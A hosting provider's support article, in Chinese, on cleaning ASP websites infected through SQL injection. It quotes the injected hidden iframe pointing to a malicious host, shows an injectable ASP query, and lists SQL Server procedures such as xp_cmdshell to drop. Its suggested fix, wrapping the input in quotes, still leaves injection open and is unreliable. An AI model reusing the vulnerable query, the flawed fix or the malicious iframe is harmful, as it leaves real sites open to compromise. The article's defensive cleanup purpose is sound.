域名頻道

歡迎您來(lái)到域名頻道,開(kāi)始互聯(lián)網(wǎng)之旅!

ASP網(wǎng)頁(yè)被插r入惡意代碼問(wèn)題

作者:技術(shù)支持來(lái)源:域名頻道發(fā)布時(shí)間:2007-5-8 9:54:33瀏覽:

這問(wèn)題我遇見(jiàn)過(guò)。也在這里發(fā)過(guò)求救,最后總結(jié)是:
這總情況沒(méi)有什么軟件可以幫你修復(fù),必須靠自己一個(gè)文件一個(gè)文件的是檢查,看是不是程序上有漏動(dòng),決大多數(shù)是程序有漏動(dòng)。
比如: 在ASP里有這個(gè)一段話,
<%
ID=request("ID")
rs.open "select * from tmptabel where id=" & ID
%>
以上這句話非常容易成為入侵者下手的地方,必須加固一下
<%
ID=request("ID")  要設(shè)法檢查這個(gè)值,如不是數(shù)值就停用它,
rs.open "select * from tmptabel where id='" & ID & "'"  把這個(gè)值有單引號(hào)括上
%>
在檢查過(guò)所有文件確定程序里沒(méi)有這類(lèi)SQL寫(xiě)法的漏洞后。接下來(lái)就要全部替換掉所有頁(yè)面里的非法插入的<script type="text/javascript" src=">
<iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe>
這個(gè)東東,(可以用Macromedia Dreamweaver這類(lèi)軟件對(duì)網(wǎng)站文件進(jìn)行檢查),或?qū)?nèi)部的網(wǎng)站把服務(wù)器上的全部復(fù)蓋,確定全部刪除后,接下來(lái)就該在網(wǎng)站內(nèi)仔細(xì)查看有沒(méi)有不是你的文件夾或文件,刪除它,不能留情,這一部是很重要的(包括隱藏文件)。再就檢查服務(wù)器內(nèi)有沒(méi)有可疑的執(zhí)行文件,一般都在根目錄下,最好都看看,有就刪別留情。
最后是屏閉掉SQL的一個(gè)危險(xiǎn)存儲(chǔ)過(guò)程,如:
/*********************************************************************
以下列出的都是危險(xiǎn)的內(nèi)置存儲(chǔ)過(guò)程,全在我們封殺之列
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
Xp_regwrite

sp_OAcreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop

sp_makewebtask


/*********************************************************************
以下為屏蔽上面所說(shuō)的危險(xiǎn)內(nèi)置存儲(chǔ)過(guò)程
sp_dropextendedproc 'xp_cmdshell'
go
sp_dropextendedproc 'xp_regaddmultistring'
go
sp_dropextendedproc 'xp_regdeletekey'
go
sp_dropextendedproc 'xp_regdeletevalue'
go
sp_dropextendedproc 'xp_regenumkeys'
go
sp_dropextendedproc 'xp_regenumvalues'
go
sp_dropextendedproc 'xp_regread'
go
sp_dropextendedproc 'xp_regremovemultistring'
go
sp_dropextendedproc 'xp_regwrite'
go
sp_dropextendedproc 'sp_OACreate'
go
sp_dropextendedproc 'sp_OADestroy'
go
sp_dropextendedproc 'sp_OAMethod'
go
sp_dropextendedproc 'sp_OAGetProperty'
go
sp_dropextendedproc 'sp_OASetProperty'
go
sp_dropextendedproc 'sp_OAGetErrorInfo'
go
sp_dropextendedproc 'sp_OAStop'
go

drop procedure sp_makewebtask


 

收藏 】 【 打印
會(huì)員 客服 QQ 電話 充值 工單
Top

24小時(shí)客服熱線

400-670-1116

021-67820741

若400電話正忙,請(qǐng)撥總機(jī) 02167820741